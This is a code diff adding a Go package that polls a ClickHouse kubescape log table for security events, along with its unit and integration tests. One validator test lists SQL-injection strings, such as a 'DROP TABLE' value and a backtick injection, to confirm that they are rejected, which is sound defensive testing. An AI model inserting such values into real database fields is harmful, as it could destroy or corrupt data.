decoupled + // from any pre-existing rows. 
+ tag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano()) + sum := sha256.Sum256([]byte(tag)) + hash := anomaly.AnomalyHash(fmt.Sprintf("%x", sum[:8])) + + now := time.Now().UTC() + row := sink.AttributionRow{ + AnomalyHash: hash, + Namespace: "redis", + Pod: "redis-test", + Comm: "redis-server", + PID: 1234, + Hostname: tag, // unique hostname → unique row + TStart: now.Add(-5 * time.Minute), + TEnd: now.Add(5 * time.Minute), + LastSeen: now, + LastRuleID: "R1005", + NAnomalies: 1, + } + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + if err := s.Write(ctx, []sink.AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", tag)) + if got != 1 { + t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", tag, got) + } +} + +// TestSinkWritePixieRows_Live exercises WritePixieRows() against every +// pixie observation table the operator owns. This is the precise bug +// surface the user reported — silent INSERT failures here mean the +// per-table fan-out writes nothing and the analyst sees empty tables. +// +// One row per table, with a unique hostname per run so subsequent runs +// don't have to reset the cluster. +func TestSinkWritePixieRows_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano()) + now := time.Now().UTC() + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + for _, table := range chpkg.PixieTables() { + row := minimalRowFor(table, tag, now) + if err := s.WritePixieRows(ctx, table, []map[string]any{row}); err != nil { + t.Errorf("WritePixieRows(%s): %v", table, err) + continue + } + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", ident, tag)) + if got < 1 { + t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got) + } + } +} + +// minimalRowFor returns the minimum-viable row map for a pixie +// observation table — only the columns the schema marks NOT NULL and +// that don't have DEFAULT clauses. The remaining columns get CH +// defaults (0 / "" / now). +func minimalRowFor(table, hostname string, t time.Time) map[string]any { + base := map[string]any{ + "time_": t.Format("2006-01-02 15:04:05.000000000"), + "upid": "0:0:0", + "hostname": hostname, + "event_time": t.Format("2006-01-02 15:04:05.000"), + "namespace": "default", + "pod": "test-pod", + } + // Some pixie tables use slightly different column shapes — provide + // the strict-minimum extras to avoid CH MissingColumn errors. 
+ switch table {
+ case "http_events":
+ base["resp_status"] = 200
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "dns_events":
+ base["remote_port"] = 53
+ base["local_port"] = 0
+ base["latency"] = 0
+ case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events",
+ "amqp_events", "mux_events", "tls_events":
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "http2_messages.beta":
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "kafka_events.beta":
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ }
+ return base
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
new file mode 100644
index 00000000000..a0beffc3ece
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
@@ -0,0 +1,35 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "trigger",
+ srcs = ["clickhouse.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "trigger_test",
+ srcs = ["clickhouse_test.go"],
+ embed = [":trigger"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
new file mode 100644
index 00000000000..5094d74d4b1
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
@@ -0,0 +1,290 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0

+// Package trigger watches forensic_db.kubescape_logs for new rows and
+// pushes parsed kubescape.Event values onto a channel. Polls the
+// ClickHouse HTTP interface (default 250ms cadence). Operator runs as
+// a DaemonSet — each instance polls only its OWN node's rows via a
+// `WHERE hostname = '{Config.Hostname}'` filter.
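+//
+// Minimal wiring sketch (NODE_NAME and handle are placeholders for
+// whatever the caller uses; this package only sees Config):
+//
+//	trg, err := trigger.New(trigger.Config{
+//		Endpoint: "http://clickhouse:8123",
+//		Hostname: os.Getenv("NODE_NAME"),
+//	})
+//	if err != nil {
+//		log.Fatal(err)
+//	}
+//	events, _ := trg.Subscribe(ctx)
+//	for ev := range events {
+//		handle(ev) // e.g. upsert attribution, fan out pixie queries
+//	}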
+package trigger
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "crypto/sha256"
+ "encoding/hex"
+ "encoding/json"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+)
+
+// Config configures the trigger. PollInterval defaults to 250ms.
+// Hostname is REQUIRED — it scopes every poll to a single node.
+type Config struct {
+ Endpoint string
+ Database string
+ Table string
+ Username string
+ Password string
+ Hostname string
+ PollInterval time.Duration
+ InitialWatermark uint64 // seeds the event_time cursor; 0 starts from the oldest row
+}
+
+// ClickHouseHTTP polls the configured table (default
+// forensic_db.kubescape_logs)
over the ClickHouse HTTP +// interface, scoped to a single node. +type ClickHouseHTTP struct { + cfg Config + client *http.Client +} + +// New validates Config and returns a ready trigger. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Endpoint == "" { + return nil, fmt.Errorf("trigger: empty Endpoint") + } + if cfg.Hostname == "" { + return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)") + } + u, err := url.Parse(cfg.Endpoint) + if err != nil { + return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err) + } + if u.Scheme != "http" && u.Scheme != "https" { + return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint) + } + if u.Host == "" { + return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint) + } + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + if cfg.Table == "" { + cfg.Table = "kubescape_logs" + } + // Validate Database / Table as plain ClickHouse identifiers + // (alphanumeric + underscore, not starting with a digit) so the + // SELECT in fetchSince cannot be subverted by an attacker-controlled + // Config. Hostname is value-quoted via quoteCH; identifiers cannot + // be parameterised, hence validation here. + if !validIdentifier(cfg.Database) { + return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + if !validIdentifier(cfg.Table) { + return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table) + } + if cfg.PollInterval <= 0 { + cfg.PollInterval = 250 * time.Millisecond + } + return &ClickHouseHTTP{ + cfg: cfg, + client: &http.Client{Timeout: 5 * time.Second}, + }, nil +} + +// identifierRE accepts plain ClickHouse identifiers — letters, digits, +// underscores; not starting with a digit. Dotted identifiers (e.g. +// "http2_messages.beta") are deliberately rejected here because the +// trigger only ever queries the kubescape ingest table, not a pixie +// observation table. +var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validIdentifier(s string) bool { return identifierRE.MatchString(s) } + +// Subscribe starts the background poll loop. The returned channel +// produces kubescape.Event values until ctx is cancelled, then closes. +func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) { + out := make(chan kubescape.Event, 64) + go t.run(ctx, out) + return out, nil +} + +func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) { + defer close(out) + // Watermark uses event_time as the cursor PLUS a set of row + // fingerprints already pushed at that exact event_time. This + // closes the race where two kubescape rows share the same + // event_time but the second arrives after our previous poll: the + // query is `event_time >= watermark` (inclusive) and we skip rows + // whose fingerprint we have already seen at the boundary. 
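+ //
+ // Worked example: poll 1 returns rows {A, B} at event_time T, so
+ // both are emitted, the watermark becomes T, and the boundary set
+ // is {fp(A), fp(B)}. Poll 2 (query `event_time >= T`) returns
+ // {A, B, C} where C committed late with the same event_time T:
+ // A and B hit the boundary set and are skipped, C is emitted and
+ // its fingerprint added. No duplicates, no losses.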
+ watermark := t.cfg.InitialWatermark + seenAtBoundary := map[string]bool{} + ticker := time.NewTicker(t.cfg.PollInterval) + defer ticker.Stop() + + pollOnce := func() { + rows, maxSeen, err := t.fetchSince(ctx, watermark) + if err != nil { + log.WithError(err).Warn("trigger: poll failed") + return + } + nextSeen := map[string]bool{} + for _, row := range rows { + fp := rowFingerprint(row) + if row.EventTime == watermark && seenAtBoundary[fp] { + continue // already pushed in a prior poll at this exact boundary + } + ev, err := kubescape.Extract(row) + if err != nil { + log.WithError(err).Debug("trigger: skip incomplete row") + continue + } + select { + case out <- ev: + case <-ctx.Done(): + return + } + if row.EventTime == maxSeen { + nextSeen[fp] = true + } + } + if maxSeen > watermark { + watermark = maxSeen + seenAtBoundary = nextSeen + } else if maxSeen == watermark { + // no progress this tick — preserve boundary set, optionally extend + for fp := range nextSeen { + seenAtBoundary[fp] = true + } + } + } + + pollOnce() + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + pollOnce() + } + } +} + +// rowFingerprint hashes the row's content so we can dedupe at the +// watermark boundary without trusting kubescape to give us a unique row id. +func rowFingerprint(r kubescape.Row) string { + h := sha256.New() + _, _ = fmt.Fprintf(h, "%d\x00%s\x00%s\x00%s\x00%s", + r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails) + return hex.EncodeToString(h.Sum(nil)) +} + +func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) { + q := url.Values{} + q.Set("query", fmt.Sprintf( + "SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+ + "FROM %s.%s "+ + "WHERE hostname = %s AND event_time >= %d "+ + "ORDER BY event_time FORMAT JSONEachRow", + t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname), watermark)) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, + t.cfg.Endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, 0, err + } + if t.cfg.Username != "" { + req.SetBasicAuth(t.cfg.Username, t.cfg.Password) + } + resp, err := t.client.Do(req) + if err != nil { + return nil, 0, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return parseJSONEachRow(resp.Body) +} + +// parseJSONEachRow streams JSONEachRow output line-by-line from r. +// Streaming (vs io.ReadAll into a []byte) bounds memory at one row +// regardless of how large the ClickHouse result set is. +// +// Malformed rows are LOGGED + SKIPPED, never fatal: a single bad line +// must not block watermark advancement and re-pin the bad row on every +// subsequent poll. Only an unrecoverable scanner error (e.g. line +// exceeds the 16 MiB buffer) fails the call. 
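+//
+// One input line as emitted by the ClickHouse HTTP interface (shape
+// mirrors the unit-test fixture; event_time may arrive bare or quoted,
+// and parseUint64Loose accepts both):
+//
+//	{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"p\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1744477360303026359","hostname":"node-1"}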
+func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) {
+ type rawRow struct {
+ RuleID string `json:"RuleID"`
+ RuntimeK8sDetails string `json:"RuntimeK8sDetails"`
+ RuntimeProcessDetails string `json:"RuntimeProcessDetails"`
+ EventTime json.RawMessage `json:"event_time"`
+ Hostname string `json:"hostname"`
+ }
+ var (
+ rows []kubescape.Row
+ maxSeen uint64
+ )
+ scanner := bufio.NewScanner(r)
+ scanner.Buffer(make([]byte, 1<<20), 1<<24)
+ for scanner.Scan() {
+ line := bytes.TrimSpace(scanner.Bytes())
+ if len(line) == 0 {
+ continue
+ }
+ var rr rawRow
+ if err := json.Unmarshal(line, &rr); err != nil {
+ log.WithError(err).Debug("trigger: skip malformed JSON row")
+ continue
+ }
+ ev, err := parseUint64Loose(rr.EventTime)
+ if err != nil {
+ log.WithError(err).Debug("trigger: skip row with bad event_time")
+ continue
+ }
+ rows = append(rows, kubescape.Row{
+ EventTime: ev,
+ RuleID: rr.RuleID,
+ Hostname: rr.Hostname,
+ K8sDetails: rr.RuntimeK8sDetails,
+ ProcessDetails: rr.RuntimeProcessDetails,
+ })
+ if ev > maxSeen {
+ maxSeen = ev
+ }
+ }
+ if err := scanner.Err(); err != nil {
+ return nil, 0, err
+ }
+ return rows, maxSeen, nil
+}
+
+func parseUint64Loose(raw json.RawMessage) (uint64, error) {
+ s := strings.TrimSpace(string(raw))
+ s = strings.Trim(s, `"`)
+ return strconv.ParseUint(s, 10, 64)
+}
+
+// chLiteralEscaper — hoisted to a package-level var so we don't allocate
+// a Replacer per call (quoteCH runs on every fetchSince poll).
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+func quoteCH(s string) string {
+ return "'" + chLiteralEscaper.Replace(s) + "'"
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
new file mode 100644
index 00000000000..1ea1bd5771a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
@@ -0,0 +1,241 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync/atomic"
+ "testing"
+ "time"
+)
+
+const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}`
+
+// TestTrigger_Polls_HostnameAndWatermark — query carries
+// WHERE hostname=… AND event_time>=…. Race-free: the server pushes
+// each query string into a buffered channel; the test waits for the
+// SECOND request deterministically (no fixed sleep, no shared
+// non-atomic variable).
+func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) { + queries := make(chan string, 8) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + queries <- r.URL.Query().Get("query") + if n == 1 { + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Hostname != "node-1" { + t.Fatalf("Hostname = %q", ev.Hostname) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event") + } + // Drain the first query, then wait for the second (advanced + // watermark) — channel-based, so no fixed sleep races. + <-queries + var lastQuery string + select { + case lastQuery = <-queries: + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } + if !strings.Contains(lastQuery, "hostname = 'node-1'") { + t.Fatalf("query missing hostname filter: %q", lastQuery) + } + if !strings.Contains(lastQuery, "event_time >= 1744477360303026359") { + t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery) + } +} + +// TestTrigger_RequiresHostname — defensive: refuses empty hostname. +func TestTrigger_RequiresHostname(t *testing.T) { + if _, err := New(Config{Endpoint: "http://x", Hostname: ""}); err == nil { + t.Fatalf("empty Hostname not rejected") + } +} + +// TestTrigger_ContextCancellationClosesChannel — clean shutdown. +func TestTrigger_ContextCancellationClosesChannel(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + ch, _ := tr.Subscribe(ctx) + cancel() + select { + case _, ok := <-ch: + if ok { + t.Fatalf("channel produced after cancel") + } + case <-time.After(300 * time.Millisecond): + t.Fatalf("channel not closed within 300ms of cancel") + } +} + +// TestTrigger_HTTPErrorContinues — transient 5xx → retry, system stable. +func TestTrigger_HTTPErrorContinues(t *testing.T) { + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n == 1 { + w.WriteHeader(503) + return + } + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm == "" { + t.Fatalf("got empty Target after recovery") + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("trigger did not recover from transient HTTP 503") + } +} + +// TestTrigger_DedupesAtWatermarkBoundary — same-event_time rows that +// arrive in a later poll than they were already observed must NOT be +// re-emitted. 
Distinct rows at the same boundary timestamp must still +// be emitted (only the duplicate is suppressed). +func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) { + const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + switch n { + case 1: + // First poll emits the canonical row. + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + case 2: + // Second poll: server "re-discovers" the SAME row at the + // boundary timestamp PLUS one DISTINCT row at the same + // event_time. The trigger must suppress the duplicate + // fingerprint and pass through the distinct one. + _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n")) + default: + _, _ = w.Write([]byte("")) + } + })) + defer srv.Close() + + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + // Collect events for ~250 ms — long enough for at least 3 polls. + deadline := time.Now().Add(250 * time.Millisecond) + var got []uint64 // PIDs we observed + for time.Now().Before(deadline) { + select { + case ev := <-ch: + got = append(got, ev.Target.PID) + case <-time.After(20 * time.Millisecond): + } + } + // Expect exactly 2 events: PID 106040 (canonical, emitted once + // even though server returned it twice) and PID 222222 (distinct + // row at same boundary, emitted exactly once). + if len(got) != 2 { + t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got) + } + canonicalSeen, distinctSeen := 0, 0 + for _, pid := range got { + switch pid { + case 106040: + canonicalSeen++ + case 222222: + distinctSeen++ + } + } + if canonicalSeen != 1 { + t.Fatalf("canonical row emitted %dx, want 1 (dedup failed)", canonicalSeen) + } + if distinctSeen != 1 { + t.Fatalf("distinct same-event_time row emitted %dx, want 1 (over-aggressive dedup)", distinctSeen) + } +} + +// TestTrigger_RejectsInvalidIdentifiers — defensive: SQL injection via +// Database/Table config is refused at construction time. +func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) { + for _, bad := range []string{ + "forensic_db; DROP TABLE alerts", + "db with space", + "123starts_with_digit", + "backtick`injection", + "forensic_db.kubescape_logs", // dotted not allowed for this table param + } { + _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad}) + if err == nil { + t.Errorf("New accepted bad Database %q; expected error", bad) + } + _, err = New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad}) + if err == nil { + t.Errorf("New accepted bad Table %q; expected error", bad) + } + } +} + +// TestTrigger_BadRowSkipped — incomplete kubescape row is skipped, good rows still arrive. 
+func TestTrigger_BadRowSkipped(t *testing.T) { + bad := `{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n" + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(bad + canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm != "redis-server" { + t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("good row not received after bad-row skip") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go new file mode 100644 index 00000000000..c8a42f73575 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go @@ -0,0 +1,149 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package trigger_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// Live integration test for the trigger's poll loop. Inserts a +// kubescape_logs row directly via HTTP, then asserts the trigger +// surfaces it as a kubescape.Event before the deadline. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +// insertKubescapeRow shoves one synthetic row into kubescape_logs via +// JSONEachRow on the HTTP interface — same shape Vector emits. 
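+// Note the seed body below writes event_time bare-numeric while the
+// unit-test fixture quotes it; parseUint64Loose accepts both wire
+// shapes, so the trigger reads either.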
+func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) { + t.Helper() + body := fmt.Sprintf( + `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`, + ruleID, ruleID, eventTime, hostname, + ) + q := url.Values{} + q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow") + req, err := http.NewRequest(http.MethodPost, + strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), + strings.NewReader(body)) + if err != nil { + t.Fatal(err) + } + req.Header.Set("Content-Type", "application/x-ndjson") + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("seed insert: %v", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf))) + } +} + +// TestTriggerSubscribe_Live: insert one row, expect one Event from the +// trigger's Subscribe channel within the deadline. +func TestTriggerSubscribe_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano()) + now := time.Now() + eventTime := uint64(now.UnixNano()) + + // Use a watermark slightly before the synthetic event_time so the + // first poll picks up exactly our row, regardless of unrelated rows + // in the table from earlier runs. + cfg := trigger.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + Hostname: hostname, + PollInterval: 200 * time.Millisecond, + InitialWatermark: eventTime - 1, + } + trg, err := trigger.New(cfg) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + ch, err := trg.Subscribe(ctx) + if err != nil { + t.Fatalf("Subscribe: %v", err) + } + + insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime) + + select { + case ev, ok := <-ch: + if !ok { + t.Fatalf("channel closed before event arrived") + } + if ev.RuleID != "R1005" { + t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID) + } + if ev.Hostname != hostname { + t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname) + } + if ev.EventTime != eventTime { + t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime) + } + if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" { + t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target) + } + case <-ctx.Done(): + t.Fatalf("trigger did not surface the seeded row within 15s") + } +}